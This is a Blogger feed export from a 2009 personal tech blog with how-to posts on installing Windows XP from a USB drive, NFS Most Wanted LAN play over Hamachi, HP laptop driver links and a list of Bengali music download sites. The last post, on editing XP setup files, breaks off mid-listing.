tag:blogger.com,1999:blog-38363106719427778872024-03-13T06:54:33.536+05:30TECH - CHECKDISCLAIMER : This Blog is written for learning purpose only. The author is not responsible for any kind of losses to any one. The information is taken from various books & Magazines.
<hr>Mainak Bhattacharya
<a href="http://www.makdee.co.cc">www.MAKDEE.co.cc</a>Mak's Bloghttp://www.blogger.com/profile/17782056756364925340noreply@blogger.comBlogger16125tag:blogger.com,1999:blog-3836310671942777887.post-56735067693495729942009-10-13T23:17:00.000+05:302009-10-13T23:18:20.254+05:30Installing Windows XP from a USB PEN DRIVEThis tutorial is designed to help those in need of installing Microsoft Windows XP on any PC that is capable of booting from a UFD (USB Flash Device) <p>Before you start you will need at your disposal:</p> <ul><li>A properly functioning windows PC</li><li>a UFD (USB Flash Device) with a minimum size of 1GB</li><li>A Windows XP CD or image</li><li><a href="http://www.sentire.co.uk/wp-content/uploads/2009/01/WinSetupFromUSB-0.1.1.exe">A copy of WinSetupFromUSB-0.1.1 available here</a></li></ul> <p>1. Download & Run <a href="http://www.sentire.co.uk/wp-content/uploads/2009/01/WinSetupFromUSB-0.1.1.exe">WinSetupFrom USB-0.1.1.</a><br /><img class="alignnone size-full wp-image-213" title="winsetupfromusb-install-program" src="http://www.sentire.co.uk/wp-content/uploads/2009/01/winsetupfromusb-install-program.png" alt="winsetupfromusb-install-program" width="517" height="396" /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />2. Complete the setup. The program will start automatically once you have finished.</p> <p><img class="alignnone size-full wp-image-214" title="winsetupfromusb" src="http://www.sentire.co.uk/wp-content/uploads/2009/01/winsetupfromusb.png" alt="winsetupfromusb" width="472" height="534" /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />3. Plug your pen drive into the computer and backup anything important from it as we are going to format it.</p> <p>4. In the WinSetupFromUSB-0.1.1 window: click Refresh next the USB selection box. The USB pen you have just plugged in should now be visible in the drop down menu. Select it.</p> <p><img class="alignnone size-full wp-image-215" title="refresh" src="http://www.sentire.co.uk/wp-content/uploads/2009/01/refresh.png" alt="refresh" width="471" height="535" /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />5. Insert your XP CD or mount an XP CD Image.</p> <p>6. In the WinSetupFromUSB-0.1.1 window: click Browse, next to the Windows 2000/XP/2003 Source box, and navigate to the location of the XP Install CD.</p> <p><img class="alignnone size-full wp-image-216" title="browse" src="http://www.sentire.co.uk/wp-content/uploads/2009/01/browse.png" alt="browse" width="480" height="535" /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />7. Now click the PE2USB button.</p> <p><img class="alignnone size-full wp-image-217" title="petousb" src="http://www.sentire.co.uk/wp-content/uploads/2009/01/petousb.png" alt="petousb" width="427" height="443" /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />8. Now Tick the Enable Disk Format box under Format Options and Tick Quick Format and Enable LBA (FAT16X). Also make sure that Enable File Copy is not ticked.</p> <p><img class="alignnone size-full wp-image-218" title="correctsetup" src="http://www.sentire.co.uk/wp-content/uploads/2009/01/correctsetup.png" alt="correctsetup" width="424" height="439" /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />9. Click Start. Click Yes when the pop up asks if you wish to continue. Click Yes again when the pop up asks you if you are sure you wish to continue. When you get the Completed successfully message click OK and close PEtoUSB.</p> <p>10. In the WinSetupFromUSB-0.1.1 window: Click GO. The Program will now create a bootable windows XP install on your USB pen drive.</p> <p>11. Click agree to the “SYSINTERNALS SOFTWARE LICENSE TERMS” pop up.</p> <p>12. Click OK to the “This is Important” pop up.</p> <p>13. The creation process is now complete: Take the newly formatted USB Pen and place it in the USB port of the target computer and turn it on.</p> <p>NOTE: You must now read carefully what pops up on the screen as it will provide you with the hot-key (keyboard shortcut key) that, when pressed, triggers access to the BIOS. It is usually something like F1, F2, Delete or Escape.</p> <p>14. Navigate the BIOS with the keyboard and find the section that contains your boot devices. With your USB drive plugged in, the USB drive should be listed. If it isn’t, your system might not support booting from USB.</p> <p>15. Assuming that it is supported (as is the case with virtually all modern hardware), promote your USB drive to the primary boot device.</p> <p>16. Exit from the BIOS configuration, saving all changes.</p> <p>17. The computer will now reboot. Assuming that you have successfully compiled the bootable USB XP install and that you have successfully selected the USB device to be booted first in the bios a screen should appear which reads Windows 2000/XP/2003 Setup – First and Second Parts . Press Enter. You will now be presented with 2 options. Select Option 1 (first part) for the first stage of the installation process.</p> <p>18. When the first stage setup completes and system reboots select Windows 2000/XP/2003 Setup – First and Second Parts, then Option 2 (second part) for the second stage of the setup.</p> <p><span style="color: rgb(255, 0, 0);">DO NOT REMOVE THE USB PEN FROM USB PORT UNTIL YOU SEE THE WINDOWS START MENU</span></p>Mak's Bloghttp://www.blogger.com/profile/17782056756364925340noreply@blogger.com0tag:blogger.com,1999:blog-3836310671942777887.post-46400813958180094262009-08-21T08:42:00.000+05:302009-08-21T08:43:40.344+05:30HOW TO: NFS MW Lan Play on Hamachi<a href="http://kavoor.wordpress.com/2008/03/17/how-to-nfs-mw-lan-play-on-hamachi/#comments"></a>There is no count on the number of Need for Speed Most Wanted enthusiasts calling me for this. So, I decided to write a guide myself.I assume that you have bought an original copy of the game. (Pirates can stop reading here itself because this guide doesn’t work for them). You need 3 basic pre-requites before you move on. <p>1. NFS MW Patch 1.3 —> Get it <a href="http://www.nfs-planet.de/nfsmw_patch.php">here</a></p> <p>2. Log Me In Hamachi —> Get it <a title="Hamachi Download" href="http://www.mediafire.com/?4dg2jx2znyc" target="_blank">here</a></p> <p>3. MW-Hamachi —> Get it <a href="http://www.mediafire.com/?syzjuytmdkn" target="_blank">here</a></p> <p>Here we go :</p> <p><strong><span>Step 1.</span></strong> Install the game.</p> <p><strong><span>Step 2.</span></strong> Install the NFSMW patch 1.3. Simple.</p> <p><strong><span>Step 3.</span></strong> Install Hamachi. Choose a nickname. Wait till it logs in. Create a new network. Ask your friends to join it.</p> <p><strong><span>Step 4</span>.</strong> Copy the MW Hamachi to the game’s installation directory.</p> <p><strong><span>Step 5.</span></strong> You need to edit the file server.cfg with notepad. Paste your hamachi IP there.</p> <div style="text-align: center;"><a title="Direct link to file" href="http://kavoor.files.wordpress.com/2008/03/nfs-lan11.jpg"><img src="http://kavoor.files.wordpress.com/2008/03/nfs-lan11.thumbnail.jpg?w=204&h=132" alt="nfs-lan11.jpg" width="204" height="132" /></a></div> <p><strong><span>Step 6.</span></strong> Run MW – Hamachi. Type speed.exe as shown.<a id="file-link-18" class="file-link image" title="nfs-lan2.jpg" href="http://kavoor.wordpress.com/2008/03/17/how-to-nfs-mw-lan-play-on-hamachi/void%280%29"><br /></a></p> <div style="text-align: center;"><a title="Direct link to file" href="http://kavoor.files.wordpress.com/2008/03/nfs-lan2.jpg"><img src="http://kavoor.files.wordpress.com/2008/03/nfs-lan2.thumbnail.jpg?w=196&h=132" alt="nfs-lan2.jpg" width="196" height="132" /></a></div> <p><strong><span>Step 7.</span></strong> Thats it. We are all set. Host / Join the server. Go Go Go.</p> <p><strong><span>Step 8. </span></strong>The Host should create the server. Others should select session match.</p> <p><strong>Note:</strong> This wont work for pirated versions as there is a conflict between Patch 1.3 and the crack.Buy the game. Pay those great people at EA who make these wonderful games.</p> <p><br /></p>Mak's Bloghttp://www.blogger.com/profile/17782056756364925340noreply@blogger.com0tag:blogger.com,1999:blog-3836310671942777887.post-22493800784149952572009-07-09T08:01:00.001+05:302009-07-09T08:02:43.667+05:30Compaq Presario C702TU Laptop Drivers<p>It is surprising that HP cuts costs by not giving a driver CD with their entry level laptop models. However the end user can get online and chat with an HP representative through their online chat system to get ftp URLs (mostly) pointing to the right drivers. Here are the Windows XP drivers for Compaq Presario C702TU model laptop.</p> <p>Before installing the audio drivers please install the UAA drivers first. Then restart the computer and install the remaining drivers. Carefully follow on-screen instructions, if any, during the installation. </p> <p>UAA Driver</p> <p><a target="_blank" href="ftp://ftp.hp.com/pub/softpaq/sp32501-33000/sp32646.exe">ftp://ftp.hp.com/pub/softpaq/sp32501-33000/sp32646.exe</a></p> <p>Audio Driver</p> <p><a target="_blank" href="http://ftp.hp.com/pub/softpaq/sp36001-36500/sp36090.exe">http://ftp.hp.com/pub/softpaq/sp36001-36500/sp36090.exe</a></p> <p>Modem Driver</p> <p><a target="_blank" href="http://ftp.hp.com/pub/softpaq/sp36001-36500/sp36089.exe">http://ftp.hp.com/pub/softpaq/sp36001-36500/sp36089.exe</a></p> <p>Wireless Lan Driver</p> <p><a target="_blank" href="ftp://ftp.hp.com/pub/softpaq/sp34001-34500/sp34152.exe">ftp://ftp.hp.com/pub/softpaq/sp34001-34500/sp34152.exe</a></p> <p>Synaptics Touchpad Driver</p> <p><a target="_blank" href="ftp://ftp.hp.com/pub/softpaq/sp35001-35500/sp35444.exe">ftp://ftp.hp.com/pub/softpaq/sp35001-35500/sp35444.exe</a></p> <p>Intel Chipset Drivers</p> <p><a target="_blank" href="http://downloadmirror.intel.com/13799/eng/ChipUtil.exe">http://downloadmirror.intel.com/13799/eng/ChipUtil.exe</a></p> <p>Ricoh 5-in-1 Card Reader Drivers</p> <p><a target="_blank" href="ftp://ftp.hp.com/pub/softpaq/sp33501-34000/sp33604.exe">ftp://ftp.hp.com/pub/softpaq/sp33501-34000/sp33604.exe</a></p>Mak's Bloghttp://www.blogger.com/profile/17782056756364925340noreply@blogger.com0tag:blogger.com,1999:blog-3836310671942777887.post-48627201220387333452009-05-12T07:38:00.005+05:302009-05-12T07:49:46.733+05:30BEST 5 BENGALI SONG DOWNLOADING WEBSITEs<span class="Apple-style-span" style=" ;font-family:Arial;font-size:12px;"><div class="content_list_item" style="padding-top: 0px; padding-right: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-bottom: 30px; "><div class="title" style="padding-top: 0px; padding-right: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font: normal normal normal 18px/25px georgia; color: rgb(0, 98, 166); text-decoration: none; padding-bottom: 3px; "><a href="http://www.associatedcontent.com/article/212949/free_bengali_music_download_from_unlimitedbanglacom.html" style="padding-top: 0px; padding-right: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; outline-style: none; outline-width: initial; outline-color: initial; font: normal normal normal 18px/25px georgia; color: rgb(0, 98, 166); text-decoration: none; padding-bottom: 3px; ">RANK # 1 Free </a><a href="http://www.associatedcontent.com/article/255007/how_to_guide_unlimited_bengali_music.html" style="padding-top: 0px; padding-right: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; outline-style: none; outline-width: initial; outline-color: initial; font: normal normal normal 18px/25px georgia; color: rgb(0, 98, 166); text-decoration: none; padding-bottom: 3px; ">Unlimited @ 2MBPS </a><a href="http://www.associatedcontent.com/article/212949/free_bengali_music_download_from_unlimitedbanglacom.html" style="padding-top: 0px; padding-right: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; outline-style: none; outline-width: initial; outline-color: initial; font: normal normal normal 18px/25px georgia; color: rgb(0, 98, 166); text-decoration: none; padding-bottom: 3px; ">Bengali Music Download from </a><a href="http://www.makdee.co.cc/">www.MAKDEE.co.cc</a></div><div class="image" style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-bottom: 0px; margin-left: 0px; float: left; width: 75px; height: 56px; text-align: center; margin-right: 10px; background-image: initial; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: rgb(237, 237, 237); background-position: initial initial; "><a href="http://www.associatedcontent.com/article/212949/free_bengali_music_download_from_unlimitedbanglacom.html" style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; color: rgb(0, 98, 166); outline-style: none; outline-width: initial; outline-color: initial; text-decoration: none; "><img class="thumb" rel="" src="http://images-cdn01.associatedcontent.com/image/A7910/79109/75_79109.jpg" style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; " /></a></div><div class="abstract image_abstract" size="14px" style="padding-top: 0px; padding-right: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; color: rgb(0, 0, 0); line-height: 16px; padding-bottom: 5px; float: left; width: 570px; "><span class="Apple-style-span" style="font-size: medium;"><span class="Apple-style-span" style="font-family: verdana;">maKDee.co.cc is a huge collection of Bengali music. Currently it has the collection of over TWO thousand Bengali songs. download the music just by creating an account at the website.</span></span></div><div class="abstract image_abstract" size="14px" style="padding-top: 0px; padding-right: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; color: rgb(0, 0, 0); line-height: 16px; padding-bottom: 5px; float: left; width: 570px; "><span class="Apple-style-span" style="font-size: 16px;"><br /></span></div><div class="abstract image_abstract" style="padding-top: 0px; padding-right: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; color: rgb(0, 0, 0); font-size: 14px; line-height: 16px; padding-bottom: 5px; float: left; width: 570px; ">Regster Link: <a href="http://www.makdee.co.cc/index.php?option=com_user&task=register">http://www.makdee.co.cc/index.php?option=com_user&task=register</a></div><div class="abstract image_abstract" style="padding-top: 0px; padding-right: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; color: rgb(0, 0, 0); font-size: 14px; line-height: 16px; padding-bottom: 5px; float: left; width: 570px; ">Log IN: <a href="http://www.makdee.co.cc/index.php?option=com_content&view=article&id=3&Itemid=7">http://www.makdee.co.cc/index.php?option=com_content&view=article&id=3&Itemid=7</a></div><div class="links" style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; color: rgb(95, 107, 118); font-size: 12px; line-height: 12px; "><br /></div><div class="clearing" style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; line-height: 1px; font-size: 1px; clear: both; "></div></div><div class="content_list_item" style="padding-top: 0px; padding-right: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-bottom: 30px; "><div class="title" style="padding-top: 0px; padding-right: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font: normal normal normal 18px/25px georgia; color: rgb(0, 98, 166); text-decoration: none; padding-bottom: 3px; "><a href="http://www.associatedcontent.com/article/255007/how_to_guide_unlimited_bengali_music.html" style="padding-top: 0px; padding-right: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; outline-style: none; outline-width: initial; outline-color: initial; font: normal normal normal 18px/25px georgia; color: rgb(0, 98, 166); text-decoration: none; padding-bottom: 3px; ">RANK # 2 Unlimited Bengali Music Download from Mybanglamusic.com</a></div><div class="image" style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-bottom: 0px; margin-left: 0px; float: left; width: 75px; height: 56px; text-align: center; margin-right: 10px; background-image: initial; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: rgb(237, 237, 237); background-position: initial initial; "><a href="http://www.associatedcontent.com/article/255007/how_to_guide_unlimited_bengali_music.html" style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; color: rgb(0, 98, 166); outline-style: none; outline-width: initial; outline-color: initial; text-decoration: none; "><img class="thumb" rel="" src="http://images-cdn01.associatedcontent.com/image/A9623/96235/75_96235.jpg" style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; " /></a></div><div class="abstract image_abstract" style="padding-top: 0px; padding-right: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; color: rgb(0, 0, 0); font-size: 14px; line-height: 16px; padding-bottom: 5px; float: left; width: 570px; ">We all look for music download from Internet. Internet becomes the greatest ever place of storing and sharing music. Know the one such great site from where you can download Bengali songs, dramas in mp3 format.</div><div class="links" style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; color: rgb(95, 107, 118); font-size: 12px; line-height: 12px; "><br /></div><div class="clearing" style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; line-height: 1px; font-size: 1px; clear: both; "></div></div><div class="content_list_item" style="padding-top: 0px; padding-right: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-bottom: 30px; "><div class="title" style="padding-top: 0px; padding-right: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font: normal normal normal 18px/25px georgia; color: rgb(0, 98, 166); text-decoration: none; padding-bottom: 3px; "><a href="http://www.associatedcontent.com/article/217232/p2p_file_sharing_how_to_find_and_download.html" style="padding-top: 0px; padding-right: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; outline-style: none; outline-width: initial; outline-color: initial; font: normal normal normal 18px/25px georgia; color: rgb(0, 98, 166); text-decoration: none; padding-bottom: 3px; ">RANK #3 P2P File Sharing: How to Find and Download Torrent Files</a></div><div class="abstract" style="padding-top: 0px; padding-right: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; color: rgb(0, 0, 0); font-size: 14px; line-height: 16px; padding-bottom: 5px; ">The next wave of P2P file sharing seems to be all about torrent files. But what exactly is a torrent file? A torrent file is a file that is divided into many pieces that may be downloaded from other people who have the file via P2P file sharing over the internet.</div><div class="links" style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; color: rgb(95, 107, 118); font-size: 12px; line-height: 12px; ">By <a href="http://www.associatedcontent.com/user/59185/tiffany_proctor.html" style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; outline-style: none; outline-width: initial; outline-color: initial; text-decoration: none; color: rgb(95, 107, 118); font-size: 12px; line-height: 12px; ">Tiffany Proctor</a> | Published 4/25/2007 | <a href="http://www.associatedcontent.com/article/217232/p2p_file_sharing_how_to_find_and_download.html" style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; outline-style: none; outline-width: initial; outline-color: initial; text-decoration: none; color: rgb(95, 107, 118); font-size: 12px; line-height: 12px; ">Read more »</a></div></div><div class="content_list_item" style="padding-top: 0px; padding-right: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-bottom: 30px; "><div class="title" style="padding-top: 0px; padding-right: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font: normal normal normal 18px/25px georgia; color: rgb(0, 98, 166); text-decoration: none; padding-bottom: 3px; "><a href="http://www.associatedcontent.com/article/341826/my_favorite_online_music_resource_for.html" style="padding-top: 0px; padding-right: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; outline-style: none; outline-width: initial; outline-color: initial; font: normal normal normal 18px/25px georgia; color: rgb(0, 98, 166); text-decoration: none; padding-bottom: 3px; ">RANK #4 My Favorite Online Music Resource for Indian Music: MusicIndiaOnline.com</a></div><div class="image" style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-bottom: 0px; margin-left: 0px; float: left; width: 75px; height: 56px; text-align: center; margin-right: 10px; background-image: initial; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: rgb(237, 237, 237); background-position: initial initial; "><a href="http://www.associatedcontent.com/article/341826/my_favorite_online_music_resource_for.html" style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; color: rgb(0, 98, 166); outline-style: none; outline-width: initial; outline-color: initial; text-decoration: none; "><img class="thumb" rel="" src="http://images-cdn01.associatedcontent.com/image/A1311/131197/75_131197.jpg" style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; " /></a></div><div class="abstract image_abstract" style="padding-top: 0px; padding-right: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; color: rgb(0, 0, 0); font-size: 14px; line-height: 16px; padding-bottom: 5px; float: left; width: 570px; ">MusicIndiaOnline is one of the best online resource of Indian music. Just try to find any songs of your choice, MusicIndiaOnline.com will surely help you with your music need.</div><div class="links" style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; color: rgb(95, 107, 118); font-size: 12px; line-height: 12px; "><br /></div><div class="clearing" style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; line-height: 1px; font-size: 1px; clear: both; "></div></div><div class="content_list_item" style="padding-top: 0px; padding-right: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-bottom: 30px; "><div class="title" style="padding-top: 0px; padding-right: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font: normal normal normal 18px/25px georgia; color: rgb(0, 98, 166); text-decoration: none; padding-bottom: 3px; "><a href="http://www.associatedcontent.com/article/8434/a_review_and_history_of_p2p_file_sharing.html" style="padding-top: 0px; padding-right: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; outline-style: none; outline-width: initial; outline-color: initial; font: normal normal normal 18px/25px georgia; color: rgb(0, 98, 166); text-decoration: none; padding-bottom: 3px; ">RANK #5 A Review and History of P2P File Sharing From Napster to Torrent to Kazaa</a></div><div class="abstract" style="padding-top: 0px; padding-right: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; color: rgb(0, 0, 0); font-size: 14px; line-height: 16px; padding-bottom: 5px; ">P2P, or peer to peer, connectivity has changed the face of file sharing in the world. Thankfully, this service will never go away.</div><div class="links" style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; color: rgb(95, 107, 118); font-size: 12px; line-height: 12px; "><br /></div></div></span>Mak's Bloghttp://www.blogger.com/profile/17782056756364925340noreply@blogger.com0tag:blogger.com,1999:blog-3836310671942777887.post-58734292840889022292009-04-29T21:30:00.001+05:302009-04-29T21:36:22.812+05:30INSTALL XP FROM USB-DRIVEThe ultimate guide for installing and running Windows XP from a USB stick / HDD drive<br />What is this about?<br />To keep the introduction short, Microsoft denies that booting Windows off a USB drive works.<br />See this page for example. It says:<br />Q: Can a USB storage device be the primary (and only) means of storage?<br />No. USB-based mass storage devices cannot be the primary hard disk storage solution on a regular system ...<br />Or this one from the microsoft newsgroups:<br />Windows cannot boot from an USB drive. If your computer supports<br />booting from such device, you can load a boot loader to the USB device<br />which starts Windows XP from the HDD.<br />Anyway, the web is full of those. I was wondering about the same thing, as i did not want to put a Windows partition on my Linux.based<br />work laptop, and thought it was a good idea to run Windows XP off a USB Hard drive that i just plug in when i need it, and boot from it.<br />To put a long story short, this is exactly what i do now, thanks to the fantastic research of the people credited below. However, it took me<br />significant time to figure out all the painful little problems, and i was not fully happy with the current official guide by Dietmar (no pun,<br />he was the first to make ANYthing public). I wanted an easy guide that allows creating a modified version of the Windows XP CD, for<br />painless and transparent installation to as many systems as you want.<br />This page is the result of my work. Have fun!<br /><br />Requirements<br />An existing Windows install for carrying out the steps in this tutorial<br />A USB2-compliant Hard disk drive (or a big USB2 stick, see remarks below)<br />An original Windows XP CD (tested only against SP1 so far, but reported to work on other versions)<br />A registered version of WinISO (or any other software that allows direct editing of ISO files)<br />The Microsoft CAB SDK<br />A CD-burning software that can handle ISO files. I like the free burnatonce<br />How To:<br />Summary:<br />We will dump the contents of your original Windows XP CD , extract a few files from the Image using ISO modification software, edit the files, and<br />put the modified versions back on the ISO. The resulting ISO image is burnt back onto a CD media, and can then directly be used to install Windows<br />on your USB drive.<br />I am also covering a few pitfalls that happened to me, in hope they will save you a bit of time.<br />1) Does your computer support booting from USB?<br />Usually, if its an option in your BIOS boot sequence menu, the answer to this is yes. If its not there, look for BIOS updates. If you are not<br />sure, proceed and see what happens ;-)<br />2) Sorting out the "Bootability" of your USB-Drive<br />Connect your USB drive to your computer, directly, without a Hub. Then, shut down your computer, disconnect any other hard disk<br />drives from it, and insert your original Windows XP CD into the drive. Start the installation, and proceed to the section where you are<br />allowed to pick a hard drive. If it goes beyond the partition selection, your drive is already fine for booting Windows XP. If not (seems to<br />be the cases with many of the Freecom USB HDDs for example), you will get an error like "Windows is unable to find your drive,<br />partition, data etc bla". This is usually not a big problem. All you need to do is "properly" format the drive. Reboot into your normal<br />Windows, and get this HP tool , and use it to format your HDD completely. I chose NTFS format, worked fine everytime i tried. After<br />this, my drives are recognized as valid installation devices by the Windows XP installer.<br />(In fact, i did not manage to create a USB primary partition with FAT32 that was recognized as being installable)<br />3) Dumping the original Windows CD into an ISO File<br />Pretty easy one. Simply open WinISO, and select Actions -> Make ISO from CDROM, and save your CD image.<br />4) Extracting the files we need to work on<br />After the CD dump is done, close and reopen WinISO. Then, open the ISO file you just created using File -> Open.<br />Now, click the I386 folder, and select the following files (Ctrl key to multi-select)<br />TXTSETUP.SIF<br />DOSNET.INF<br />USB.IN_<br />USBPORT.IN_<br />USBSTOR.IN_<br />Select Actions -> Extract and put the resulting files into some folder to work on them.<br />5) Unpacking IN_ files<br />Use the Cab SDK (from the command line) for extracting the contents of the .IN_ files. Each of them contains exactly one .inf file. If you<br />are unsure how to use the Cab SDK, here is an example command line: "cabarc x USBSTOR.IN_" . You should end up with three new<br />files in the folder, called:<br />usb.inf<br />usbport.inf<br />usbstor.inf<br />You can now delete the .IN_ files.<br />6) Editing the files<br />This is the main job. i ll also try to explain a bit whats happening. Use a simple Texteditor like Notepad.<br />6-A) TXTSETUP.SIF<br />This file is loaded on the initial install step by the Windows XP CD installer. In this file, we will change the way Windows<br />treats USB devices during system setup -- the default is to only treat them as input devices during installation -- we will<br />change this to include mass storage driver support (which needs to be loaded into the installer much earlier in order to work).<br />First, move the following entries from [InputDevicesSupport.Load] to the [BootBusExtenders.Load] section , as shown here<br />[BootBusExtenders.Load]<br />pci = pci.sys<br />acpi = acpi.sys<br />isapnp = isapnp.sys<br />acpiec = acpiec.sys<br />ohci1394 = ohci1394.sys<br />usbehci = usbehci.sys<br />usbohci = usbohci.sys<br />usbuhci = usbuhci.sys<br />usbhub = usbhub.sys<br />usbstor = usbstor.sys<br />[InputDevicesSupport.Load]<br />usbehci = usbehci.sys<br />usbohci = usbohci.sys<br />usbuhci = usbuhci.sys<br />usbhub = usbhub.sys<br />usbccgp = usbccgp.sys<br />hidusb = hidusb.sys<br />serial = serial.sys<br />serenum = serenum.sys<br />usbstor = usbstor.sys<br />... now the same for [BootBusExtenders] and [InputDevicesSupport]<br />[BootBusExtenders]<br />pci = "PCI-Bustreiber",files.pci,pci<br />acpi = "ACPI Plug & Play-Bustreiber",files.acpi,acpi<br />isapnp = "ISA Plug & Play-Bustreiber",files.isapnp,isapnp<br />acpiec = "Integrierter ACPI-Controllertreiber",files.none,acpiec<br />ohci1394 = "IEEE-1394-Bus-OHCI-konformer Anschlusstreiber",files.ohci1394,ohci1394<br />usbehci = "Erweiterter Hostcontroller",files.usbehci,usbehci<br />usbohci = "Open Hostcontroller",files.usbohci,usbohci<br />usbuhci = "Universeller Hostcontroller",files.usbuhci,usbuhci<br />usbhub = "Standard-USB-Hubtreiber",files.usbhub,usbhub<br />usbstor = "USB-Speicherklassentreiber",files.usbstor,usbstor<br />[InputDevicesSupport]<br />usbehci = "Erweiterter Hostcontroller",files.usbehci,usbehci<br />usbohci = "Open Hostcontroller",files.usbohci,usbohci<br 